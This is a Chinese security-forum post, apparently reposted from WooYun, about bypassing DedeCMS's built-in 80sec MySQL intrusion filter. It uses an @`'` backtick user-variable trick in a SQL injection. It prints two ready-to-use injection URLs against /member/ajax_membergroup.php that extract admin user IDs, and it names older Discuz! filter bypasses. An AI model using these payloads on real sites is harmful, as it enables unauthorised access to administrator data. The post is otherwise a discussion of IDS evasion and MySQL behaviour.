讨论下IDS的绕过

自从知道dedecms自带了80sec的内置Mysqlids后，一直以来也没有想到绕过的办法。或者是自己mysql的根底太差了吧。于是分析dedecms源码时，只找模板执行，本地包含，上传等，完全没有想到注入存在的可能性了。
可以看看某牛的很久以前的分析

http://www.oldjun.com/blog/index.php/archives/66/（其中：80sec的内置Mysqlids可能的绕过方法）

之前也看过，感觉也是同意的。

但今天看到dede再暴漏洞，居然存在注入？

文章在这里：http://www.sa666.com/thread-25247-1-1.html

注入关键地方：/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

最终执行语句是：

SELECT groupname FROM dede_member_group WHERE mid = 0 AND id=@`\'`
Union select userid from `dede_admin` where 1 or id=@`\'` LIMIT 0,1;

关键是：@`'`  这个

一直以为 反引号 只用于字段表等特殊地方，但没想到还可以用于值的，于是就顺理绕过了IDS的检测，在IDS中变成：select
groupname from dede_member_group where mid = 0 and id=@`\$s$` limit 0,1。

如果执行：select * from table where id=`8` 会出错。

但执行：select * from table where id=@`8` 即正常，但没查出数据。

即这个值“@`8`”不是简单的值 8 那是什么值呢？

mysql> select @`8`;

+------+

| @`8` |

+------+

| NULL |

+------+

1 row in set (0.00 sec)

据我所知，这个@是由用户声明的局部变量。估计就是把整个值当为整个变量吧？

不知想法对不对。有对mysql了解的可以来解释一下。

至于有人说为什么会有些出现：Safe Alert: Request Error step 2!

这是由于dedecms的另一个问题了，这里就不多说，和GPC有关，可以下面语句绕过：

/member/ajax_membergroup.php?action=post&membergroup=@`\'` Union select userid from `%23@__admin` where 1 or id=@`\'`

IDS的防和绕过一直在斗争着。

在Discuz! 中，IDS也起到了很大作用，从前面的 /*!*/ 绕过和 union all等绕过，到现在的修复。

大家还有什么IDS的绕过技巧或案例可以分享的么？^-^

摘自：http://zone.wooyun.org/content/108